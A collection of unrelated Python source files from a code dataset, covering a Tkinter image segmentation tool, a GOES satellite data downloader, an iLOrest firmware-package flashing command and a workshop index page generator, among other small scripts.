array2=[]
array3=[]
#--------------------------------------------------------------------------------------------------
App = Tk()
App.iconbitmap(default='favicon.ico')
App.title("Image Segmentation Tool")
App.geometry("400x400")
#--------------------------------------------------------------------------------------------------
# Functions and Actions
def selectfolder():
global filename
filename = filedialog.askdirectory()
isFile=os.path.isdir(filename + "/" + "Segmentation")
if(not isFile):
os.mkdir(filename + "/" + "Segmentation")
print(filename)
for r, d, files in os.walk(filename):
for file in files:
directoryview.insert(END,file)
landingPage.destroy()
App.geometry("{0}x{1}+0+0".format(App.winfo_screenwidth()-20, App.winfo_screenheight()-80))
App.resizable(0,0)
imsegpage.pack(fill=BOTH)
def showimg(event):
n = directoryview.curselection()
global fname,img,segmap
fname = directoryview.get(n)
imsegcanvas.delete("all")
imgpath=filename+"/"+fname
img = Image.open(imgpath)
imgwidth, imgheight = img.size
# img = img.resize((300, 300), Image.ANTIALIAS)
# Segmentation Map
segmap = np.zeros((imgheight, imgwidth, 3), np.uint8)
img = ImageTk.PhotoImage(img)
imsegcanvas.config(width=imgwidth,height=imgheight,scrollregion=(0,0,imgwidth,imgheight))
imsegcanvas.create_image(0,0, anchor=NW, image=img)
def choose_color():
global color_code
global clf
clf = colorchooser.askcolor(title="Choose color")
color_code=clf[1]
print(color_code)
def point(event):
try:
x1, y1 = (imsegcanvas.canvasx(event.x) - 1), (imsegcanvas.canvasy(event.y) - 1)
imsegcanvas.create_oval(x1 - 2, y1 - 2, x1 + 2, y1 + 2, fill="#ff0000")
array.append(x1)
array.append(y1)
array2.append([x1, y1])
except:
messagebox.showerror("Error", "Error Occured")
def clearcanvas(event):
imsegcanvas.delete("all")
imsegcanvas.create_image(0, 0, anchor=NW, image=img)
imsegcanvas.image = img
messagebox.showinfo("Message", "Segmap Cleared")
def genpolygon(event):
try:
imsegcanvas.create_polygon(array, outline=color_code, fill=color_code, width=3, stipple="gray50")
pts = np.array(array2, np.int32)
pts = pts.reshape((-1, 1, 2))
cv2.fillPoly(segmap, [pts], [clf[0][2],clf[0][1],clf[0][0]], 1)
array2.clear()
array.clear()
except:
messagebox.showerror("Error", "Error Occured")
def outline(event):
try:
x1, y1 = (imsegcanvas.canvasx(event.x) - 1), (imsegcanvas.canvasy(event.y) - 1)
imsegcanvas.create_oval(x1 - 1, y1 - 1, x1 + 1, y1 + 1, fill="#ff0000")
array.append(x1)
array.append(y1)
array2.append([x1, y1])
except:
messagebox.showerror("Error", "Error Occured")
def save():
print(filename+"/Segmentation/"+fname)
cv2.imwrite(filename+"/Segmentation/"+fname, segmap)
messagebox.showinfo("Message", "Image Saved")
# def bbox(event):
# if len(array3)>=3:
# imsegcanvas.create_rectangle(array3[0],array3[1],array3[2],array3[3],fill="")
# array3.clear()
# x1, y1 = (imsegcanvas.canvasx(event.x) - 1), (imsegcanvas.canvasy(event.y) - 1)
# imsegcanvas.create_oval(x1 - 2, y1 - 2, x1 + 2, y1 + 2, fill="#ff0000")
# array3.append(x1)
# array3.append(y1)
#--------------------------------------------------------------------------------------------------
# Landing Page
global landingPage
landingPage = Frame(App)
landingText = Label(landingPage,text="An Image Segmentation Tool using Tkinter and OpenCV")
selectFolder = Button(landingPage,text="Select Image Folder",command=selectfolder)
canvas = Canvas(landingPage, width = 300, height = 300)
imgland = Image.open("Segvizlogo.png")
imgland = imgland.resize((300, 300), Image.ANTIALIAS)
imgland=ImageTk.PhotoImage(imgland)
canvas.create_image(20,20, anchor=NW, image=imgland)
canvas.pack()
selectFolder.pack(side=BOTTOM,fill=BOTH)
landingText.pack(fill=BOTH,side=BOTTOM)
landingPage.pack()
#--------------------------------------------------------------------------------------------------
# Image Segmentation Tool
global imsegpage
global canvasimage
global imsegcanvas
global imageoncanvas
global wt,ht
imsegpage = Frame(App)
currentimage=Image.open("segvizbg.png")
currentimage=currentimage.resize((250, 250), Image.ANTIALIAS)
wt,ht=currentimage.size
imsegcanvas = Canvas(imsegpage,width=wt,height=ht)
canvasimage = ImageTk.PhotoImage(currentimage)
imsegcanvas.create_image(0,0, anchor=NW, image=canvasimage)
# List Box for files
global directoryview
directoryview=Listbox(imsegpage)
directoryview.bind("<<ListboxSelect>>", showimg)
directoryview.pack(side="left", fill=Y,expand=False)
# Scrollbars for Image
scroll_x = Scrollbar(imsegpage, orient="horizontal", command=imsegcanvas.xview)
scroll_y = Scrollbar(imsegpage, orient="vertical", command=imsegcanvas.yview)
imsegcanvas.configure(yscrollcommand=scroll_y.set, xscrollcommand=scroll_x.set)
scroll_x.pack(side=BOTTOM,fill=X)
scroll_y.pack(side=RIGHT,fill=Y)
# Tab Control
tabControl = ttk.Notebook(imsegpage)
tab1 = ttk.Frame(tabControl)
selectcolor = Button(tab1,text="Select Color",command=choose_color)
save = Button(tab1,text="Save Segmentation",command=save)
tabControl.add(tab1, text='Tools')
# Pack the widgets
selectcolor.pack(fill=BOTH)
save.pack(fill=BOTH)
tabControl.pack(side=TOP,fill=X)
# Bind the canvas actions
imsegcanvas.bind("<Double-1>",point)
# imsegcanvas.bind("<Button-1>",bbox)
imsegcanvas.bind("<Button-3>",genpolygon)
imsegcanvas.bind("<B1-Motion>",outline)
imsegcanvas.bind("<Button-2>",clearcanvas)
#--------------------------------------------------------------------------------------------------
imsegcanvas.pack()
App.mainloop() | StarcoderdataPython |
1751973 | <filename>server/wrappers/StorageService.py
from abc import ABC, abstractmethod
class StorageService(ABC):
@abstractmethod
def test_connection(api):
pass
@abstractmethod
def saveData(data):
pass
@abstractmethod
def insert_node(data):
pass
@abstractmethod
def insert_edge(data):
pass
@abstractmethod
def queryData(*args):
pass
| StarcoderdataPython |
3328890 | #!/usr/bin/python
import GTFBasics
import sys
# Pre: A GTF filename, for a file with 'exon' features, and 'gene_id' and 'transcript_id' attributes.
# Post: Prints to stdout a genepred with transcripts
def main():
if len(sys.argv) < 2:
sys.stderr.write("gtf_to_genepred.py <gtf filename>\n")
return
gtf = GTFBasics.GTFFile(sys.argv[1])
gtf.write_genepred(sys.stdout)
main()
| StarcoderdataPython |
3318160 | <reponame>Mog333/CMPUT551_ML_Project<gh_stars>0
scores = open("finalScore2.txt",'r')
ids = open("tes",'r')
output = open("final.csv",'w')
parsing = True
for i in range(0, 4000):
score = scores.readline().strip()
scoreID = ids.readline().strip()
output.write(str(scoreID) + "\t" + str(score) + "\n")
output.close()
ids.close()
scores.close()
| StarcoderdataPython |
40265 | from pvapy import Channel, CA, PvTimeStamp, PvAlarm
print('DBRdouble')
channel = Channel('DBRdouble')
timestamp = PvTimeStamp(10, 100)
alarm = PvAlarm(1,1,"mess")
print(channel.get('value'))
print('here 1')
channel.put(alarm,'record[process=false]field(alarm)')
print('here 2')
print(channel.get('value'))
channel.put(timestamp,'record[process=false]field(timeStamp)')
print(channel.get('value'))
print('here 3')
print('DBRdouble CA')
channel = Channel('DBRdouble',CA)
print(channel.get('value'))
print('here 4')
channel.put(alarm,'record[process=false]field(alarm)')
print('here 5')
print(channel.get('value'))
channel.put(timestamp,'record[process=false]field(timeStamp)')
print(channel.get('value'))
print('here 6')
| StarcoderdataPython |
3360215 | <filename>GOES/downloads/download_data.py
# -*- coding: utf-8 -*-
#-----------------------------------------------------------------------------------------------------------------------------------
'''
Description: Downloads GOES-16/17 data from amazon
Author: <NAME>
E-mail: <EMAIL>
Created date: Mar 23, 2020
Modification date: Feb 22, 2021
'''
#-----------------------------------------------------------------------------------------------------------------------------------
import numpy as np
import s3fs
from datetime import *
import requests
from urllib3.util.retry import Retry
from requests.adapters import HTTPAdapter
#-----------------------------------------------------------------------------------------------------------------------------------
def show_products():
'''
Lists the products available from GOES-16 and GOES-17.
'''
Satellite = ['goes16','goes17']
print(' ')
for sat in Satellite:
print('Products for '+sat+':')
fs = s3fs.S3FileSystem(anon=True)
for item in fs.ls('s3://noaa-'+sat+'/'):
if item.split('/')[-1] == 'index.html':
print(' ')
else:
print('\t'+item.split('/')[-1])
print('Descriptions of each product is shown in https://docs.opendata.aws/noaa-goes16/cics-readme.html#about-the-data \n')
#-----------------------------------------------------------------------------------------------------------------------------------
def download_file(URL, name_file, path_out, retries=10, backoff=10, size_format='Decimal', show_download_progress=True):
'''
Save data in file.
Parameters
----------
URL : str
Link of file.
name_file : str
Name of output file.
path_out : str, optional, default ''
Path of folder where file will be saved.
retries : int, optional, default 10
Defines the retries number to connect to server.
See: https://urllib3.readthedocs.io/en/latest/reference/urllib3.util.html#module-urllib3.util.retry
backoff: int, optional, default 10
A backoff factor to apply between attempts after the second try.
See: https://urllib3.readthedocs.io/en/latest/reference/urllib3.util.html#module-urllib3.util.retry
size_format: str, optional, default 'Decimal'
Defines how is print the size of file.
Options are:
'Decimal' : divide file size (in bytes) by (1000*1000)
'Binary' : divide file size (in bytes) by (1024*1024)
show_download_progress : boolean, optional, default True
Parameter to enable and disable the visualization of download progress.
'''
StartTime = datetime.now()
retries_config = Retry(total=retries, backoff_factor=backoff, status_forcelist=[500, 502, 503, 504])
session = requests.Session()
session.mount('http://', HTTPAdapter(max_retries=retries_config))
session.mount('https://', HTTPAdapter(max_retries=retries_config))
req = session.get(URL, stream=True)
#req = requests.get(URL, stream=True)
total_size = int(req.headers['content-length'])
size = 0
if size_format == 'Binary':
dsize = 1024*1024
else:
dsize = 1000*1000
with open(path_out+name_file,'wb') as output_file:
for chunk in req.iter_content(chunk_size=1024):
if chunk:
rec_size = output_file.write(chunk)
size = rec_size + size
if show_download_progress==True:
print(' {} {:3.0f}% {:.1f}MB {}'.format(name_file,100.0*size/total_size, size/dsize, '{}m{}s'.format(round((datetime.now()-StartTime).seconds/60.0),(datetime.now()-StartTime).seconds%60) if (datetime.now()-StartTime).seconds>60 else '{}s'.format((datetime.now()-StartTime).seconds) ), end="\r") #, flush=True)
#print('\t{}\t{:3.0f}%\t{:.2f} min'.format(name_file,100.0*size/total_size, (datetime.now()-StartTime).seconds/60.0), end="\r") #, flush=True)
if size == total_size:
#print('\n')
print(' {} {:3.0f}% {:.1f}MB {}'.format(name_file,100.0*size/total_size, size/dsize, '{}m{}s'.format(round((datetime.now()-StartTime).seconds/60.0),(datetime.now()-StartTime).seconds%60) if (datetime.now()-StartTime).seconds>60 else '{}s'.format((datetime.now()-StartTime).seconds) ))
#print('\b')
#-----------------------------------------------------------------------------------------------------------------------------------
def download(Satellite, Product, DateTimeIni=None, DateTimeFin=None, domain=None, channel=None, rename_fmt=False, path_out='', retries=10, backoff=10, size_format='Decimal', show_download_progress=True):
'''
Download data of GOES-16 and GOES-17 from Amazon server.
This function is based on the code of
blaylockbk https://gist.github.com/blaylockbk/d60f4fce15a7f0475f975fc57da9104d
Parameters
----------
Satellite : str
Indicates serie of GOES, the options are 'goes16' and 'goes17'
Product : str
Indicates the instrument and level of product. The products
can be list using: GOES.show_products()
DateTimeIni : str
String that indicates the initial datetime. Its structure
must be yyyymmdd-HHMMSS
Example:
DateTimeIni='20180520-183000'
DateTimeFin : str
String that indicates the final datetime. Its structure
must be yyyymmdd-HHMMSS
Example:
DateTimeFin='20180520-183000'
domain : str
This parameter just is necessary with Mesoescale products.
The options are:
M1 : Mesoscale 1
M2 : Mesoscale 2
channel : list
This parameter just is necessary with ABI-L1b-Rad and ABI-L2-CMIP products.
List indicates the channel or channels that will be download.
The channels can be mentioned individually as elements of the list
or as a sequence of channels separated by a hyphen ('-').
Example:
channel = ['02','08','09','10','11','13']
channel = ['02','08-11','13']
rename_fmt : boolean or str, optional, default False
Is an optional parameter and its default value is rename_fmt=False which
indicates that the file name is kept. If would you like that the file name
just keep the start time of scan you have to define the format of datetime.
See the next link to know about datetime format:
https://docs.python.org/3/library/datetime.html#strftime-and-strptime-format-codes).
Example:
rename_fmt = '%Y%m%d%H%M%S'
rename_fmt = '%Y%m%d%H%M'
rename_fmt = '%Y%j%H%M'
path_out : str, optional, default ''
Optional string that indicates the folder where data will be download.
The default value is folder where python was open.
retries: int, optional, default 10
Defines the retries number to connect to server.
See: https://urllib3.readthedocs.io/en/latest/reference/urllib3.util.html#module-urllib3.util.retry
backoff: int, optional, default 10
A backoff factor to apply between attempts after the second try.
See: https://urllib3.readthedocs.io/en/latest/reference/urllib3.util.html#module-urllib3.util.retry
size_format: str, optional, default 'Decimal'
It defines how is print the size of file.
Options are:
'Decimal' : divide file size (in bytes) by (1000*1000)
'Binary' : divide file size (in bytes) by (1024*1024)
show_download_progress : boolean, optional, default True
Parameter to enable and disable the visualization of download progress.
Return
------
Download_files : list
List with the downloaded files (path+filename).
'''
# ---------- Satellite -------------------
try:
assert Satellite == 'goes16' or Satellite == 'goes17'
except AssertionError:
print('\nSatellite should be goes16 or goes17\n')
return
else:
if Satellite == 'goes16':
Sat = 'G16'
elif Satellite == 'goes17':
Sat = 'G17'
# ---------- Product and Domain -------------------
if Product[-1] == 'M':
try:
assert domain == 'M1' or domain == 'M2'
except AssertionError:
print("\nProduct domain is mesoscale so you need define domain='M1' or domain='M2'\n")
return
else:
if domain == 'M1':
Product2 = Product+'1'
elif domain == 'M2':
Product2 = Product+'2'
else:
Product2 = Product
# ---------- DateTimeIni -------------------
try:
assert DateTimeIni != None
except AssertionError:
print('\nYou must define initial DateTimeIni\n')
return
else:
DateTimeIni = datetime.strptime(DateTimeIni, '%Y%m%d-%H%M%S')
# ---------- DateTimeFin -------------------
if DateTimeFin == None :
DateTimeFin = DateTimeIni
else:
DateTimeFin = datetime.strptime(DateTimeFin, '%Y%m%d-%H%M%S')
# ---------- channel -------------------
if Product[:-1] in ['ABI-L1b-Rad','ABI-L2-CMIP']:
try:
assert channel != None
except AssertionError:
print('\nYou must define channel or channels\n')
return
else:
try:
assert isinstance(channel, list) == True
except AssertionError:
print('\nChannel must be a list\n')
return
else:
ChannelList = []
for item in channel:
try:
assert isinstance(item, str) == True
except AssertionError:
print('\nEach elements of channel must have string format\n')
return
else:
try:
assert len(item) == 2 or len(item) == 5
except AssertionError:
print('\nElement of channel must be string with two or five characters\n')
return
else:
if len(item) == 2 :
ChannelList.append(item)
elif len(item) == 5 :
ChIni, ChEnd = item.split('-')
for Chn in range(int(ChIni),int(ChEnd)+1):
ChannelList.append('{:02d}'.format(Chn))
#if download_info == 'minimal' or download_info == 'full':
# print('channel list: {}'.format(ChannelList))
#"""
Downloaded_files = []
if show_download_progress == True:
print('Files:')
# ---------- Loop -------------------
DateTimeIniLoop = DateTimeIni.replace(minute=0)
DateTimeFinLoop = DateTimeFin.replace(minute=0)+timedelta(minutes=60)
while DateTimeIniLoop < DateTimeFinLoop :
DateTimeFolder = DateTimeIniLoop.strftime('%Y/%j/%H/')
server = 's3://noaa-'+Satellite+'/'+Product+'/'
fs = s3fs.S3FileSystem(anon=True)
ListFiles = np.array(fs.ls(server+DateTimeFolder))
for line in ListFiles:
if Product[:-1] in ['ABI-L1b-Rad','ABI-L2-CMIP']:
NameFile = line.split('/')[-1]
ChannelFile = NameFile.split('_')[1][-2:]
DateTimeFile = datetime.strptime(NameFile[NameFile.find('_s')+2:NameFile.find('_e')-1], '%Y%j%H%M%S')
if Product2 in NameFile and ChannelFile in ChannelList and DateTimeIni <= DateTimeFile <= DateTimeFin:
if rename_fmt == False:
NameOut = NameFile
else:
NameOut = NameFile[:NameFile.find('_s')+2] + DateTimeFile.strftime(rename_fmt) + '.nc'
#print(ChannelFile, DateTimeFile, NameOut)
download_file('https://noaa-'+Satellite+'.s3.amazonaws.com'+line[len('noaa-'+Satellite):], NameOut, path_out, retries=retries, backoff=backoff, size_format=size_format, show_download_progress=show_download_progress)
Downloaded_files.append(path_out+NameOut)
else:
NameFile = line.split('/')[-1]
DateTimeFile = datetime.strptime(NameFile[NameFile.find('_s')+2:NameFile.find('_e')-1], '%Y%j%H%M%S')
if Product2 in NameFile and DateTimeIni <= DateTimeFile <= DateTimeFin:
if rename_fmt == False:
NameOut = NameFile
else:
NameOut = NameFile[:NameFile.find('_s')+2] + DateTimeFile.strftime(rename_fmt) + '.nc'
#print(DateTimeFile, NameOut)
download_file('https://noaa-'+Satellite+'.s3.amazonaws.com'+line[len('noaa-'+Satellite):], NameOut, path_out, retries=retries, backoff=backoff, size_format=size_format, show_download_progress=show_download_progress)
Downloaded_files.append(path_out+NameOut)
DateTimeIniLoop = DateTimeIniLoop + timedelta(minutes=60)
Downloaded_files.sort()
return Downloaded_files;
#-----------------------------------------------------------------------------------------------------------------------------------
| StarcoderdataPython |
4840924 | <reponame>LaudateCorpus1/python-redfish-utility
# ##
# Copyright 2016-2021 <NAME>, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ##
# -*- coding: utf-8 -*-
""" Fwpkg Command for rdmc """
import os
import json
import shutil
import zipfile
import tempfile
import ctypes
from ctypes import c_char_p, c_int, c_bool
from redfish.hpilo.risblobstore2 import BlobStore2
from rdmc_helper import (
IncompatibleiLOVersionError,
ReturnCodes,
Encryption,
InvalidCommandLineErrorOPTS,
InvalidCommandLineError,
InvalidFileInputError,
UploadError,
TaskQueueError,
FirmwareUpdateError,
)
def _get_comp_type(payload):
"""Get's the component type and returns it
:param payload: json payload of .fwpkg file
:type payload: dict.
:returns: returns the type of component. Either A,B,C, or D.
:rtype: string
"""
ctype = ""
if "Uefi" in payload["UpdatableBy"] and "RuntimeAgent" in payload["UpdatableBy"]:
ctype = "D"
else:
for device in payload["Devices"]["Device"]:
for image in device["FirmwareImages"]:
if "DirectFlashOk" not in list(image.keys()):
raise InvalidFileInputError("Cannot flash this firmware.")
if image["DirectFlashOk"]:
ctype = "A"
if image["ResetRequired"]:
ctype = "B"
break
elif image["UefiFlashable"]:
ctype = "C"
break
else:
ctype = "D"
return ctype
class FwpkgCommand:
"""Fwpkg command class"""
def __init__(self):
self.ident = {
"name": "flashfwpkg",
"usage": None,
"description": "Run to upload and flash "
"components from fwpkg files.\n\n\tUpload component and flashes it or sets a task"
"queue to flash.\n\texample: flashfwpkg component.fwpkg.\n\n\t"
"Skip extra checks before adding taskqueue. (Useful when adding "
"many flashfwpkg taskqueue items in sequence.)\n\texample: flashfwpkg "
"component.fwpkg --ignorechecks",
"summary": "Flashes fwpkg components using the iLO repository.",
"aliases": ["fwpkg"],
"auxcommands": [
"UploadComponentCommand",
"UpdateTaskQueueCommand",
"FirmwareUpdateCommand",
"FwpkgCommand",
],
}
self.cmdbase = None
self.rdmc = None
self.auxcommands = dict()
def run(self, line, help_disp=False):
"""Main fwpkg worker function
:param line: string of arguments passed in
:type line: str.
:param help_disp: display help flag
:type line: bool.
"""
if help_disp:
self.parser.print_help()
return ReturnCodes.SUCCESS
try:
(options, _) = self.rdmc.rdmc_parse_arglist(self, line)
if not line or line[0] == "help":
self.parser.print_help()
return ReturnCodes.SUCCESS
except (InvalidCommandLineErrorOPTS, SystemExit):
if ("-h" in line) or ("--help" in line):
return ReturnCodes.SUCCESS
else:
raise InvalidCommandLineErrorOPTS("")
self.fwpkgvalidation(options)
if self.rdmc.app.typepath.defs.isgen9:
raise IncompatibleiLOVersionError(
"iLO Repository commands are only available on iLO 5."
)
if self.rdmc.app.getiloversion() <= 5.120 and options.fwpkg.lower().startswith(
"iegen10"
):
raise IncompatibleiLOVersionError(
"Please upgrade to iLO 5 1.20 or "
"greater to ensure correct flash of this firmware."
)
tempdir = ""
if not options.fwpkg.endswith(".fwpkg"):
InvalidFileInputError(
"Invalid file type. Please make sure the file "
"provided is a valid .fwpkg file type."
)
try:
components, tempdir, comptype = self.preparefwpkg(self, options.fwpkg)
if comptype == "D":
raise InvalidFileInputError("Unable to flash this fwpkg file.")
elif comptype == "C":
try:
self.taskqueuecheck()
except TaskQueueError as excp:
if options.ignore:
self.rdmc.ui.warn(str(excp) + "\n")
else:
raise excp
self.applyfwpkg(options, tempdir, components, comptype)
if comptype == "A":
message = "Firmware has successfully been flashed.\n"
if "ilo" in options.fwpkg.lower():
message += (
"iLO will reboot to complete flashing. Session will be"
" terminated.\n"
)
elif comptype == "B":
message = (
"Firmware has successfully been flashed and a reboot is required for "
"this firmware to take effect.\n"
)
elif comptype == "C":
message = "This firmware is set to flash on reboot.\n"
self.rdmc.ui.printer(message)
except (FirmwareUpdateError, UploadError) as excp:
raise excp
finally:
if tempdir:
shutil.rmtree(tempdir)
self.cmdbase.logout_routine(self, options)
# Return code
return ReturnCodes.SUCCESS
def taskqueuecheck(self):
"""Check taskqueue for potential issues before starting"""
select = "ComputerSystem."
results = self.rdmc.app.select(selector=select, path_refresh=True)
try:
results = results[0]
except:
pass
powerstate = results.resp.dict["PowerState"]
tasks = self.rdmc.app.getcollectionmembers(
"/redfish/v1/UpdateService/UpdateTaskQueue/"
)
for task in tasks:
if task["State"] == "Exception":
raise TaskQueueError(
"Exception found in taskqueue which will "
"prevent firmware from flashing. Please run "
"iLOrest command: taskqueue --cleanqueue to clear"
" any errors before continuing."
)
if (
task["UpdatableBy"] == "Uefi"
and not powerstate == "Off"
or task["Command"] == "Wait"
):
raise TaskQueueError(
"Taskqueue item found that will "
"prevent firmware from flashing immediately. Please "
"run iLOrest command: taskqueue --resetqueue to "
"reset the queue if you wish to flash immediately "
"or include --ignorechecks to add this firmware "
"into the task queue anyway."
)
if tasks:
self.rdmc.ui.warn(
"Items are in the taskqueue that may delay the flash until they "
"are finished processing. Use the taskqueue command to monitor updates.\n"
)
@staticmethod
def preparefwpkg(self, pkgfile):
"""Prepare fwpkg file for flashing
:param pkgfile: Location of the .fwpkg file
:type pkgfile: string.
:returns: returns the files needed to flash, directory they are located
in, and type of file.
:rtype: string, string, string
"""
files = []
imagefiles = []
payloaddata = None
tempdir = tempfile.mkdtemp()
try:
zfile = zipfile.ZipFile(pkgfile)
zfile.extractall(tempdir)
zfile.close()
except Exception as excp:
raise InvalidFileInputError("Unable to unpack file. " + str(excp))
files = os.listdir(tempdir)
if "payload.json" in files:
with open(os.path.join(tempdir, "payload.json"), encoding="utf-8") as pfile:
data = pfile.read()
payloaddata = json.loads(data)
else:
raise InvalidFileInputError("Unable to find payload.json in fwpkg file.")
comptype = _get_comp_type(payloaddata)
if comptype == "C":
imagefiles = [
self.auxcommands["flashfwpkg"].type_c_change(tempdir, pkgfile)
]
else:
results = self.rdmc.app.getprops(
selector="UpdateService.", props=["Oem/Hpe/Capabilities"]
)
for device in payloaddata["Devices"]["Device"]:
for firmwareimage in device["FirmwareImages"]:
if firmwareimage["FileName"] not in imagefiles:
imagefiles.append(firmwareimage["FileName"])
if (
"blobstore" in self.rdmc.app.redfishinst.base_url
and comptype in ["A", "B"]
and results
and "UpdateFWPKG" in results[0]["Oem"]["Hpe"]["Capabilities"]
):
dll = BlobStore2.gethprestchifhandle()
dll.isFwpkg20.argtypes = [c_char_p, c_int]
dll.isFwpkg20.restype = c_bool
with open(pkgfile, "rb") as fwpkgfile:
fwpkgdata = fwpkgfile.read()
fwpkg_buffer = ctypes.create_string_buffer(fwpkgdata)
if dll.isFwpkg20(fwpkg_buffer, 2048):
imagefiles = [pkgfile]
tempdir = ""
return imagefiles, tempdir, comptype
def type_c_change(self, tdir, pkgloc):
"""Special changes for type C
:param tempdir: path to temp directory
:type tempdir: string.
:param components: components to upload
:type components: list.
:returns: The location of the type C file to upload
:rtype: string.
"""
shutil.copy(pkgloc, tdir)
fwpkgfile = os.path.split(pkgloc)[1]
zfile = fwpkgfile[:-6] + ".zip"
zipfileloc = os.path.join(tdir, zfile)
os.rename(os.path.join(tdir, fwpkgfile), zipfileloc)
return zipfileloc
def applyfwpkg(self, options, tempdir, components, comptype):
"""Apply the component to iLO
:param options: command line options
:type options: list.
:param tempdir: path to temp directory
:type tempdir: string.
:param components: components to upload
:type components: list.
:param comptype: type of component. Either A,B,C, or D.
:type comptype: str.
"""
for component in components:
taskqueuecommand = " create %s " % os.path.basename(component)
if options.tover:
taskqueuecommand = " create %s --tpmover" % os.path.basename(component)
if component.endswith(".fwpkg") or component.endswith(".zip"):
uploadcommand = "--component %s" % component
else:
uploadcommand = "--component %s" % os.path.join(tempdir, component)
if options.forceupload:
uploadcommand += " --forceupload"
if comptype in ["A", "B"]:
uploadcommand += " --update_target --update_repository"
if options.update_srs:
uploadcommand += " --update_srs"
self.rdmc.ui.printer(
"Uploading firmware: %s\n" % os.path.basename(component)
)
try:
ret = self.auxcommands["uploadcomp"].run(uploadcommand)
if ret != ReturnCodes.SUCCESS:
raise UploadError
except UploadError:
if comptype in ["A", "B"]:
select = self.rdmc.app.typepath.defs.hpilofirmwareupdatetype
results = self.rdmc.app.select(selector=select)
try:
results = results[0]
except:
pass
if results:
update_path = results.resp.request.path
error = self.rdmc.app.get_handler(update_path, silent=True)
self.auxcommands["firmwareupdate"].printerrmsg(error)
else:
raise FirmwareUpdateError(
"Error occurred while updating the firmware."
)
else:
raise UploadError("Error uploading component.")
if comptype == "C":
self.rdmc.ui.warn(
"Setting a taskqueue item to flash UEFI flashable firmware.\n"
)
self.auxcommands["taskqueue"].run(taskqueuecommand)
def fwpkgvalidation(self, options):
"""fwpkg validation function
:param options: command line options
:type options: list.
"""
self.rdmc.login_select_validation(self, options)
def definearguments(self, customparser):
"""Wrapper function for new command main function
:param customparser: command line input
:type customparser: parser.
"""
if not customparser:
return
self.cmdbase.add_login_arguments_group(customparser)
customparser.add_argument(
"fwpkg", help="""fwpkg file path""", metavar="[FWPKG]"
)
customparser.add_argument(
"--forceupload",
dest="forceupload",
action="store_true",
help="Add this flag to force upload firmware with the same name "
"already on the repository.",
default=False,
)
customparser.add_argument(
"--ignorechecks",
dest="ignore",
action="store_true",
help="Add this flag to ignore all checks to the taskqueue "
"before attempting to process the .fwpkg file.",
default=False,
)
customparser.add_argument(
"--tpmover",
dest="tover",
action="store_true",
help="If set then the TPMOverrideFlag is passed in on the "
"associated flash operations",
default=False,
)
customparser.add_argument(
"--update_srs",
dest="update_srs",
action="store_true",
help="Add this flag to update the System Recovery Set with the uploaded firmware. "
"NOTE: This requires an account login with the system recovery set privilege.",
default=False,
)
| StarcoderdataPython |
1607539 | #!/usr/bin/env python2
# coding: utf-8
TEMPLATE="""<html>
<head>
<title>{{ title }}</title>
<link rel="stylesheet" href="index.css">
</head>
<body>
<div class="main">
<table>
<tr><td class="header" colspan="3">{{ title }}</td></tr>
{% if coming_soon %}
<tr><td class="title" colspan="3">Coming soon near you</td></tr>
{% for item in coming_soon %}
<tr>
<td>{{ item.title }}</td>
<td>{% if item.slides %}<a class="slides" href="{{ item.slides }}" />{% endif %}</td>
<td><a class="attend" href="{{ item.attend }}" /></td>
</tr>
<tr>
<td class="details">Scheduled {{ item.prettydate }} at {{ item.event }} in {{item.city }}.</td>
</tr>
{% endfor %}
{% endif %}
{% if past_workshops %}
<tr><td class="title" colspan="3">Past workshops</td></tr>
{% for item in past_workshops[:5] %}
<tr>
<td>{{ item.title }}</td>
<td><a class="slides" href="{{ item.slides }}" /></td>
<td>{% if item.video %}<a class="video" href="{{ item.video }}" />{% endif %}</td>
</tr>
<tr>
<td class="details">Delivered {{ item.prettydate }} at {{ item.event }} in {{item.city }}.</td>
</tr>
{% endfor %}
{% if past_workshops[5:] %}
<tr>
<td>... and at least <a href="past.html">{{ past_workshops[5:] | length }} more</a>.</td>
</tr>
{% endif %}
{% endif %}
{% if recorded_workshops %}
<tr><td class="title" colspan="3">Recorded workshops</td></tr>
{% for item in recorded_workshops %}
<tr>
<td>{{ item.title }}</td>
<td><a class="slides" href="{{ item.slides }}" /></td>
<td><a class="video" href="{{ item.video }}" /></td>
</tr>
<tr>
<td class="details">Delivered {{ item.prettydate }} at {{ item.event }} in {{item.city }}.</td>
</tr>
{% endfor %}
{% endif %}
{% if self_paced %}
<tr><td class="title" colspan="3">Self-paced tutorials</td></tr>
{% for item in self_paced %}
<tr>
<td>{{ item.title }}</td>
<td><a class="slides" href="{{ item.slides }}" /></td>
</tr>
{% endfor %}
{% endif %}
{% if all_past_workshops %}
<tr><td class="title" colspan="3">Past workshops</td></tr>
{% for item in all_past_workshops %}
<tr>
<td>{{ item.title }}</td>
<td><a class="slides" href="{{ item.slides }}" /></td>
{% if item.video %}
<td><a class="video" href="{{ item.video }}" /></td>
{% endif %}
</tr>
<tr>
<td class="details">Delivered {{ item.prettydate }} at {{ item.event }} in {{item.city }}.</td>
</tr>
{% endfor %}
{% endif %}
<tr><td class="spacer"></td></tr>
<tr>
<td class="footer">
Maintained by <NAME> (<a href="https://twitter.com/jpetazzo">@jpetazzo</a>) and <a href="https://github.com/jpetazzo/container.training/graphs/contributors">contributors</a>.
</td>
</tr>
</table>
</div>
</body>
</html>""".decode("utf-8")
import datetime
import jinja2
import yaml
items = yaml.load(open("index.yaml"))
for item in items:
if "date" in item:
date = item["date"]
suffix = {
1: "st", 2: "nd", 3: "rd",
21: "st", 22: "nd", 23: "rd",
31: "st"}.get(date.day, "th")
# %e is a non-standard extension (it displays the day, but without a
# leading zero). If strftime fails with ValueError, try to fall back
# on %d (which displays the day but with a leading zero when needed).
try:
item["prettydate"] = date.strftime("%B %e{}, %Y").format(suffix)
except ValueError:
item["prettydate"] = date.strftime("%B %d{}, %Y").format(suffix)
today = datetime.date.today()
coming_soon = [i for i in items if i.get("date") and i["date"] >= today]
coming_soon.sort(key=lambda i: i["date"])
past_workshops = [i for i in items if i.get("date") and i["date"] < today]
past_workshops.sort(key=lambda i: i["date"], reverse=True)
self_paced = [i for i in items if not i.get("date")]
recorded_workshops = [i for i in items if i.get("video")]
template = jinja2.Template(TEMPLATE)
with open("index.html", "w") as f:
f.write(template.render(
title="Container Training",
coming_soon=coming_soon,
